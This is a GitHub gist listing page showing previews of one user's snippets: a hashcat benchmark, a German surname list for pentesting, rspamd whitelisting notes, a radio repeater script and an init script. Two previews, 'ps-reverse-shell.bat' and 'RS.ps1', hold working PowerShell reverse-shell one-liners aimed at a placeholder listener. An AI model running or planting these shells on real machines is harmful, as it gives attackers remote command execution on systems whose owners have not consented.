Skip to content

Instantly share code, notes, and snippets.

@laemmy
laemmy / QuadroP1000-hashcat-benchmark.txt
Created December 20, 2021 12:28
Just a hashcat benchmark for Nvidia Quadro P1000, 3996/4039 MB, 5MCU
hashcat (v6.1.1) starting in benchmark mode...
Benchmarking uses hand-optimized kernel code by default.
You can use it in your cracking session by setting the -O option.
Note: Using optimized kernel code limits the maximum supported password length.
To disable the optimized kernel code in benchmark mode, use the -w option.
CUDA API (CUDA 11.4)
====================
* Device #1: Quadro P1000, 3996/4039 MB, 5MCU
@laemmy
laemmy / gist:edb28117f1c380b81549f5ce4ddd1dd2
Last active July 5, 2020 12:50
Ich habe für einen Pentest eine Liste mit deutschen Namen benötigt. Bei Wikipedia wurde ich fündig. Umlaute und ß wurden umgeschrieben. https://de.wikipedia.org/wiki/Liste_der_h%C3%A4ufigsten_Familiennamen_in_Deutschland#Liste_der_100_h%C3%A4ufigsten_Familiennamen_in_Deutschland
Mueller
Schmidt
Schneider
Fischer
Weber
Meyer
Wagner
Becker
Schulz
Hoffmann
Mueller
Schmidt
Schneider
Fischer
Weber
Meyer
Wagner
Becker
Schulz
Hoffmann
@laemmy
laemmy / how-to-oscp-final.md
Created July 23, 2019 12:06 — forked from meldridge/how-to-oscp-final.md
How to pass the OSCP
@laemmy
laemmy / ps-reverse-shell.bat
Created July 22, 2019 11:21
powershell reverse shell snippet
powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('HOST',PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
@laemmy
laemmy / RS.ps1
Created July 18, 2019 12:03 — forked from ohpe/RS.ps1
PowerShell Reverse Shell
powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('<LISTENERIP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
### Keybase proof
I hereby claim:
* I am laemmy on github.
* I am laemmy (https://keybase.io/laemmy) on keybase.
* I have a public key ASC_Cheg6wUXr2x_OCuUebHpekmXDWO9zbYPiTLdBtrNfwo
To claim this, I am signing this object:
@laemmy
laemmy / rspamd-whitelisting.md
Created May 6, 2019 17:33 — forked from ThomasLeister/rspamd-whitelisting.md
How to whitelist IP addresses or domains in Rspamd

Whitelist IP addresses based on pre-filter policy

/etc/rspamd/local.d/multimap.conf:

  IP_WHITELIST {
      type = "ip";
      prefilter = "true";
      map = "/${LOCAL_CONFDIR}/local.d/ip_whitelist.map";
 action = "accept";
#!/usr/bin/env python3
#
import requests
import json
URL="https://repeatermap.de/api.php"
result=requests.get(URL)
repeater=result.json()
def print_csv():
#print("0;num;type;callsign;dmrid;qrg;shift;cc;mix;ctcss;net;city;cnty;country;ctry;lat;lon;longcall;callext1;callext2;txcontact1;rxgroup1;txcontact2;rxgroup2;pwr;scanlist1;scanlist2;scanlistfm")
#! /bin/bash
### BEGIN INIT INFO
# Provides: MMDVM Hotspot
# Required-Start: $local_fs $network
# Required-Stop: $local_fs
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: MMDVM Hotspot service
# Description: MMDVM Hotspot service